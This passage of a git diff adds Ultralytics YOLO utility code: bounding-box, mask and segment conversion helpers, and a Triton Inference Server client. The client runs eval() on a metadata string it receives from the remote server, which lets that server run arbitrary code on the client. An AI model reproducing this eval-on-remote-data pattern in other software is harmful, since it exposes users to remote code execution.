coords[..., 0].clamp(0, shape[1]) # x + coords[..., 1] = coords[..., 1].clamp(0, shape[0]) # y + else: # np.array (faster grouped) + coords[..., 0] = coords[..., 0].clip(0, shape[1]) # x + coords[..., 1] = coords[..., 1].clip(0, shape[0]) # y + return coords + + +def scale_image(masks, im0_shape, ratio_pad=None): + """ + Takes a mask, and resizes it to the original image size. + + Args: + masks (np.ndarray): Resized and padded masks/images, [h, w, num]/[h, w, 3]. + im0_shape (tuple): The original image shape. + ratio_pad (tuple): The ratio of the padding to the original image. + + Returns: + masks (np.ndarray): The masks that are being returned with shape [h, w, num]. + """ + # Rescale coordinates (xyxy) from im1_shape to im0_shape + im1_shape = masks.shape + if im1_shape[:2] == im0_shape[:2]: + return masks + if ratio_pad is None: # calculate from im0_shape + gain = min(im1_shape[0] / im0_shape[0], im1_shape[1] / im0_shape[1]) # gain = old / new + pad = (im1_shape[1] - im0_shape[1] * gain) / 2, (im1_shape[0] - im0_shape[0] * gain) / 2 # wh padding + else: + # gain = ratio_pad[0][0] + pad = ratio_pad[1] + top, left = int(pad[1]), int(pad[0]) # y, x + bottom, right = int(im1_shape[0] - pad[1]), int(im1_shape[1] - pad[0]) + + if len(masks.shape) < 2: + raise ValueError(f'"len of masks shape" should be 2 or 3, but got {len(masks.shape)}') + masks = masks[top:bottom, left:right] + masks = cv2.resize(masks, (im0_shape[1], im0_shape[0])) + if len(masks.shape) == 2: + masks = masks[:, :, None] + + return masks + + +def xyxy2xywh(x): + """ + Convert bounding box coordinates from (x1, y1, x2, y2) format to (x, y, width, height) format where (x1, y1) is the + top-left corner and (x2, y2) is the bottom-right corner. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x1, y1, x2, y2) format. + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x, y, width, height) format. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = empty_like(x) # faster than clone/copy + y[..., 0] = (x[..., 0] + x[..., 2]) / 2 # x center + y[..., 1] = (x[..., 1] + x[..., 3]) / 2 # y center + y[..., 2] = x[..., 2] - x[..., 0] # width + y[..., 3] = x[..., 3] - x[..., 1] # height + return y + + +def xywh2xyxy(x): + """ + Convert bounding box coordinates from (x, y, width, height) format to (x1, y1, x2, y2) format where (x1, y1) is the + top-left corner and (x2, y2) is the bottom-right corner. Note: ops per 2 channels faster than per channel. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x, y, width, height) format. + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x1, y1, x2, y2) format. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = empty_like(x) # faster than clone/copy + xy = x[..., :2] # centers + wh = x[..., 2:] / 2 # half width-height + y[..., :2] = xy - wh # top left xy + y[..., 2:] = xy + wh # bottom right xy + return y + + +def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0): + """ + Convert normalized bounding box coordinates to pixel coordinates. + + Args: + x (np.ndarray | torch.Tensor): The bounding box coordinates. + w (int): Width of the image. Defaults to 640 + h (int): Height of the image. Defaults to 640 + padw (int): Padding width. Defaults to 0 + padh (int): Padding height. Defaults to 0 + Returns: + y (np.ndarray | torch.Tensor): The coordinates of the bounding box in the format [x1, y1, x2, y2] where + x1,y1 is the top-left corner, x2,y2 is the bottom-right corner of the bounding box. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = empty_like(x) # faster than clone/copy + y[..., 0] = w * (x[..., 0] - x[..., 2] / 2) + padw # top left x + y[..., 1] = h * (x[..., 1] - x[..., 3] / 2) + padh # top left y + y[..., 2] = w * (x[..., 0] + x[..., 2] / 2) + padw # bottom right x + y[..., 3] = h * (x[..., 1] + x[..., 3] / 2) + padh # bottom right y + return y + + +def xyxy2xywhn(x, w=640, h=640, clip=False, eps=0.0): + """ + Convert bounding box coordinates from (x1, y1, x2, y2) format to (x, y, width, height, normalized) format. x, y, + width and height are normalized to image dimensions. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x1, y1, x2, y2) format. + w (int): The width of the image. Defaults to 640 + h (int): The height of the image. Defaults to 640 + clip (bool): If True, the boxes will be clipped to the image boundaries. Defaults to False + eps (float): The minimum value of the box's width and height. Defaults to 0.0 + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x, y, width, height, normalized) format + """ + if clip: + x = clip_boxes(x, (h - eps, w - eps)) + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = empty_like(x) # faster than clone/copy + y[..., 0] = ((x[..., 0] + x[..., 2]) / 2) / w # x center + y[..., 1] = ((x[..., 1] + x[..., 3]) / 2) / h # y center + y[..., 2] = (x[..., 2] - x[..., 0]) / w # width + y[..., 3] = (x[..., 3] - x[..., 1]) / h # height + return y + + +def xywh2ltwh(x): + """ + Convert the bounding box format from [x, y, w, h] to [x1, y1, w, h], where x1, y1 are the top-left coordinates. + + Args: + x (np.ndarray | torch.Tensor): The input tensor with the bounding box coordinates in the xywh format + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xyltwh format + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 0] = x[..., 0] - x[..., 2] / 2 # top left x + y[..., 1] = x[..., 1] - x[..., 3] / 2 # top left y + return y + + +def xyxy2ltwh(x): + """ + Convert nx4 bounding boxes from [x1, y1, x2, y2] to [x1, y1, w, h], where xy1=top-left, xy2=bottom-right. + + Args: + x (np.ndarray | torch.Tensor): The input tensor with the bounding boxes coordinates in the xyxy format + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xyltwh format. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 2] = x[..., 2] - x[..., 0] # width + y[..., 3] = x[..., 3] - x[..., 1] # height + return y + + +def ltwh2xywh(x): + """ + Convert nx4 boxes from [x1, y1, w, h] to [x, y, w, h] where xy1=top-left, xy=center. + + Args: + x (torch.Tensor): the input tensor + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xywh format. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 0] = x[..., 0] + x[..., 2] / 2 # center x + y[..., 1] = x[..., 1] + x[..., 3] / 2 # center y + return y + + +def xyxyxyxy2xywhr(x): + """ + Convert batched Oriented Bounding Boxes (OBB) from [xy1, xy2, xy3, xy4] to [xywh, rotation]. Rotation values are + returned in radians from 0 to pi/2. + + Args: + x (numpy.ndarray | torch.Tensor): Input box corners [xy1, xy2, xy3, xy4] of shape (n, 8). + + Returns: + (numpy.ndarray | torch.Tensor): Converted data in [cx, cy, w, h, rotation] format of shape (n, 5). + """ + is_torch = isinstance(x, torch.Tensor) + points = x.cpu().numpy() if is_torch else x + points = points.reshape(len(x), -1, 2) + rboxes = [] + for pts in points: + # NOTE: Use cv2.minAreaRect to get accurate xywhr, + # especially some objects are cut off by augmentations in dataloader. + (cx, cy), (w, h), angle = cv2.minAreaRect(pts) + rboxes.append([cx, cy, w, h, angle / 180 * np.pi]) + return torch.tensor(rboxes, device=x.device, dtype=x.dtype) if is_torch else np.asarray(rboxes) + + +def xywhr2xyxyxyxy(x): + """ + Convert batched Oriented Bounding Boxes (OBB) from [xywh, rotation] to [xy1, xy2, xy3, xy4]. Rotation values should + be in radians from 0 to pi/2. + + Args: + x (numpy.ndarray | torch.Tensor): Boxes in [cx, cy, w, h, rotation] format of shape (n, 5) or (b, n, 5). + + Returns: + (numpy.ndarray | torch.Tensor): Converted corner points of shape (n, 4, 2) or (b, n, 4, 2). + """ + cos, sin, cat, stack = ( + (torch.cos, torch.sin, torch.cat, torch.stack) + if isinstance(x, torch.Tensor) + else (np.cos, np.sin, np.concatenate, np.stack) + ) + + ctr = x[..., :2] + w, h, angle = (x[..., i : i + 1] for i in range(2, 5)) + cos_value, sin_value = cos(angle), sin(angle) + vec1 = [w / 2 * cos_value, w / 2 * sin_value] + vec2 = [-h / 2 * sin_value, h / 2 * cos_value] + vec1 = cat(vec1, -1) + vec2 = cat(vec2, -1) + pt1 = ctr + vec1 + vec2 + pt2 = ctr + vec1 - vec2 + pt3 = ctr - vec1 - vec2 + pt4 = ctr - vec1 + vec2 + return stack([pt1, pt2, pt3, pt4], -2) + + +def ltwh2xyxy(x): + """ + It converts the bounding box from [x1, y1, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right. + + Args: + x (np.ndarray | torch.Tensor): the input image + + Returns: + y (np.ndarray | torch.Tensor): the xyxy coordinates of the bounding boxes. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 2] = x[..., 2] + x[..., 0] # width + y[..., 3] = x[..., 3] + x[..., 1] # height + return y + + +def segments2boxes(segments): + """ + It converts segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh). + + Args: + segments (list): list of segments, each segment is a list of points, each point is a list of x, y coordinates + + Returns: + (np.ndarray): the xywh coordinates of the bounding boxes. + """ + boxes = [] + for s in segments: + x, y = s.T # segment xy + boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy + return xyxy2xywh(np.array(boxes)) # cls, xywh + + +def resample_segments(segments, n=1000): + """ + Inputs a list of segments (n,2) and returns a list of segments (n,2) up-sampled to n points each. + + Args: + segments (list): a list of (n,2) arrays, where n is the number of points in the segment. + n (int): number of points to resample the segment to. Defaults to 1000 + + Returns: + segments (list): the resampled segments. + """ + for i, s in enumerate(segments): + s = np.concatenate((s, s[0:1, :]), axis=0) + x = np.linspace(0, len(s) - 1, n - len(s) if len(s) < n else n) + xp = np.arange(len(s)) + x = np.insert(x, np.searchsorted(x, xp), xp) if len(s) < n else x + segments[i] = ( + np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)], dtype=np.float32).reshape(2, -1).T + ) # segment xy + return segments + + +def crop_mask(masks, boxes): + """ + It takes a mask and a bounding box, and returns a mask that is cropped to the bounding box. + + Args: + masks (torch.Tensor): [n, h, w] tensor of masks + boxes (torch.Tensor): [n, 4] tensor of bbox coordinates in relative point form + + Returns: + (torch.Tensor): The masks are being cropped to the bounding box. + """ + _, h, w = masks.shape + x1, y1, x2, y2 = torch.chunk(boxes[:, :, None], 4, 1) # x1 shape(n,1,1) + r = torch.arange(w, device=masks.device, dtype=x1.dtype)[None, None, :] # rows shape(1,1,w) + c = torch.arange(h, device=masks.device, dtype=x1.dtype)[None, :, None] # cols shape(1,h,1) + + return masks * ((r >= x1) * (r < x2) * (c >= y1) * (c < y2)) + + +def process_mask(protos, masks_in, bboxes, shape, upsample=False): + """ + Apply masks to bounding boxes using the output of the mask head. + + Args: + protos (torch.Tensor): A tensor of shape [mask_dim, mask_h, mask_w]. + masks_in (torch.Tensor): A tensor of shape [n, mask_dim], where n is the number of masks after NMS. + bboxes (torch.Tensor): A tensor of shape [n, 4], where n is the number of masks after NMS. + shape (tuple): A tuple of integers representing the size of the input image in the format (h, w). + upsample (bool): A flag to indicate whether to upsample the mask to the original image size. Default is False. + + Returns: + (torch.Tensor): A binary mask tensor of shape [n, h, w], where n is the number of masks after NMS, and h and w + are the height and width of the input image. The mask is applied to the bounding boxes. + """ + c, mh, mw = protos.shape # CHW + ih, iw = shape + masks = (masks_in @ protos.float().view(c, -1)).view(-1, mh, mw) # CHW + width_ratio = mw / iw + height_ratio = mh / ih + + downsampled_bboxes = bboxes.clone() + downsampled_bboxes[:, 0] *= width_ratio + downsampled_bboxes[:, 2] *= width_ratio + downsampled_bboxes[:, 3] *= height_ratio + downsampled_bboxes[:, 1] *= height_ratio + + masks = crop_mask(masks, downsampled_bboxes) # CHW + if upsample: + masks = F.interpolate(masks[None], shape, mode="bilinear", align_corners=False)[0] # CHW + return masks.gt_(0.0) + + +def process_mask_native(protos, masks_in, bboxes, shape): + """ + It takes the output of the mask head, and crops it after upsampling to the bounding boxes. + + Args: + protos (torch.Tensor): [mask_dim, mask_h, mask_w] + masks_in (torch.Tensor): [n, mask_dim], n is number of masks after nms. + bboxes (torch.Tensor): [n, 4], n is number of masks after nms. + shape (tuple): The size of the input image (h,w). + + Returns: + masks (torch.Tensor): The returned masks with dimensions [h, w, n]. + """ + c, mh, mw = protos.shape # CHW + masks = (masks_in @ protos.float().view(c, -1)).view(-1, mh, mw) + masks = scale_masks(masks[None], shape)[0] # CHW + masks = crop_mask(masks, bboxes) # CHW + return masks.gt_(0.0) + + +def scale_masks(masks, shape, padding=True): + """ + Rescale segment masks to shape. + + Args: + masks (torch.Tensor): (N, C, H, W). + shape (tuple): Height and width. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + """ + mh, mw = masks.shape[2:] + gain = min(mh / shape[0], mw / shape[1]) # gain = old / new + pad = [mw - shape[1] * gain, mh - shape[0] * gain] # wh padding + if padding: + pad[0] /= 2 + pad[1] /= 2 + top, left = (int(pad[1]), int(pad[0])) if padding else (0, 0) # y, x + bottom, right = (int(mh - pad[1]), int(mw - pad[0])) + masks = masks[..., top:bottom, left:right] + + masks = F.interpolate(masks, shape, mode="bilinear", align_corners=False) # NCHW + return masks + + +def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None, normalize=False, padding=True): + """ + Rescale segment coordinates (xy) from img1_shape to img0_shape. + + Args: + img1_shape (tuple): The shape of the image that the coords are from. + coords (torch.Tensor): the coords to be scaled of shape n,2. + img0_shape (tuple): the shape of the image that the segmentation is being applied to. + ratio_pad (tuple): the ratio of the image size to the padded image size. + normalize (bool): If True, the coordinates will be normalized to the range [0, 1]. Defaults to False. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + + Returns: + coords (torch.Tensor): The scaled coordinates. + """ + if ratio_pad is None: # calculate from img0_shape + gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new + pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding + else: + gain = ratio_pad[0][0] + pad = ratio_pad[1] + + if padding: + coords[..., 0] -= pad[0] # x padding + coords[..., 1] -= pad[1] # y padding + coords[..., 0] /= gain + coords[..., 1] /= gain + coords = clip_coords(coords, img0_shape) + if normalize: + coords[..., 0] /= img0_shape[1] # width + coords[..., 1] /= img0_shape[0] # height + return coords + + +def regularize_rboxes(rboxes): + """ + Regularize rotated boxes in range [0, pi/2]. + + Args: + rboxes (torch.Tensor): Input boxes of shape(N, 5) in xywhr format. + + Returns: + (torch.Tensor): The regularized boxes. + """ + x, y, w, h, t = rboxes.unbind(dim=-1) + # Swap edge and angle if h >= w + w_ = torch.where(w > h, w, h) + h_ = torch.where(w > h, h, w) + t = torch.where(w > h, t, t + math.pi / 2) % math.pi + return torch.stack([x, y, w_, h_, t], dim=-1) # regularized boxes + + +def masks2segments(masks, strategy="all"): + """ + It takes a list of masks(n,h,w) and returns a list of segments(n,xy). + + Args: + masks (torch.Tensor): the output of the model, which is a tensor of shape (batch_size, 160, 160) + strategy (str): 'all' or 'largest'. Defaults to all + + Returns: + segments (List): list of segment masks + """ + from ultralytics.data.converter import merge_multi_segment + + segments = [] + for x in masks.int().cpu().numpy().astype("uint8"): + c = cv2.findContours(x, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0] + if c: + if strategy == "all": # merge and concatenate all segments + c = ( + np.concatenate(merge_multi_segment([x.reshape(-1, 2) for x in c])) + if len(c) > 1 + else c[0].reshape(-1, 2) + ) + elif strategy == "largest": # select largest segment + c = np.array(c[np.array([len(x) for x in c]).argmax()]).reshape(-1, 2) + else: + c = np.zeros((0, 2)) # no segments found + segments.append(c.astype("float32")) + return segments + + +def convert_torch2numpy_batch(batch: torch.Tensor) -> np.ndarray: + """ + Convert a batch of FP32 torch tensors (0.0-1.0) to a NumPy uint8 array (0-255), changing from BCHW to BHWC layout. + + Args: + batch (torch.Tensor): Input tensor batch of shape (Batch, Channels, Height, Width) and dtype torch.float32. + + Returns: + (np.ndarray): Output NumPy array batch of shape (Batch, Height, Width, Channels) and dtype uint8. + """ + return (batch.permute(0, 2, 3, 1).contiguous() * 255).clamp(0, 255).to(torch.uint8).cpu().numpy() + + +def clean_str(s): + """ + Cleans a string by replacing special characters with '_' character. + + Args: + s (str): a string needing special characters replaced + + Returns: + (str): a string with special characters replaced by an underscore _ + """ + return re.sub(pattern="[|@#!¡·$€%&()=?¿^*;:,¨´><+]", repl="_", string=s) + + +def empty_like(x): + """Creates empty torch.Tensor or np.ndarray with same shape as input and float32 dtype.""" + return ( + torch.empty_like(x, dtype=torch.float32) if isinstance(x, torch.Tensor) else np.empty_like(x, dtype=np.float32) + ) diff --git a/2024.ultralytics/v8.3.46/utils/triton.py b/2024.ultralytics/v8.3.46/utils/triton.py new file mode 100644 index 0000000..cc53ed5 --- /dev/null +++ b/2024.ultralytics/v8.3.46/utils/triton.py @@ -0,0 +1,93 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +from typing import List +from urllib.parse import urlsplit + +import numpy as np + + +class TritonRemoteModel: + """ + Client for interacting with a remote Triton Inference Server model. + + Attributes: + endpoint (str): The name of the model on the Triton server. + url (str): The URL of the Triton server. + triton_client: The Triton client (either HTTP or gRPC). + InferInput: The input class for the Triton client. + InferRequestedOutput: The output request class for the Triton client. + input_formats (List[str]): The data types of the model inputs. + np_input_formats (List[type]): The numpy data types of the model inputs. + input_names (List[str]): The names of the model inputs. + output_names (List[str]): The names of the model outputs. + """ + + def __init__(self, url: str, endpoint: str = "", scheme: str = ""): + """ + Initialize the TritonRemoteModel. + + Arguments may be provided individually or parsed from a collective 'url' argument of the form + ://// + + Args: + url (str): The URL of the Triton server. + endpoint (str): The name of the model on the Triton server. + scheme (str): The communication scheme ('http' or 'grpc'). + """ + if not endpoint and not scheme: # Parse all args from URL string + splits = urlsplit(url) + endpoint = splits.path.strip("/").split("/")[0] + scheme = splits.scheme + url = splits.netloc + + self.endpoint = endpoint + self.url = url + + # Choose the Triton client based on the communication scheme + if scheme == "http": + import tritonclient.http as client # noqa + + self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False) + config = self.triton_client.get_model_config(endpoint) + else: + import tritonclient.grpc as client # noqa + + self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False) + config = self.triton_client.get_model_config(endpoint, as_json=True)["config"] + + # Sort output names alphabetically, i.e. 'output0', 'output1', etc. + config["output"] = sorted(config["output"], key=lambda x: x.get("name")) + + # Define model attributes + type_map = {"TYPE_FP32": np.float32, "TYPE_FP16": np.float16, "TYPE_UINT8": np.uint8} + self.InferRequestedOutput = client.InferRequestedOutput + self.InferInput = client.InferInput + self.input_formats = [x["data_type"] for x in config["input"]] + self.np_input_formats = [type_map[x] for x in self.input_formats] + self.input_names = [x["name"] for x in config["input"]] + self.output_names = [x["name"] for x in config["output"]] + self.metadata = eval(config.get("parameters", {}).get("metadata", {}).get("string_value", "None")) + + def __call__(self, *inputs: np.ndarray) -> List[np.ndarray]: + """ + Call the model with the given inputs. + + Args: + *inputs (List[np.ndarray]): Input data to the model. + + Returns: + (List[np.ndarray]): Model outputs. + """ + infer_inputs = [] + input_format = inputs[0].dtype + for i, x in enumerate(inputs): + if x.dtype != self.np_input_formats[i]: + x = x.astype(self.np_input_formats[i]) + infer_input = self.InferInput(self.input_names[i], [*x.shape], self.input_formats[i].replace("TYPE_", "")) + infer_input.set_data_from_numpy(x) + infer_inputs.append(infer_input) + + infer_outputs = [self.InferRequestedOutput(output_name) for output_name in self.output_names] + outputs = self.triton_client.infer(model_name=self.endpoint, inputs=infer_inputs, outputs=infer_outputs) + + return [outputs.as_numpy(output_name).astype(input_format) for output_name in self.output_names]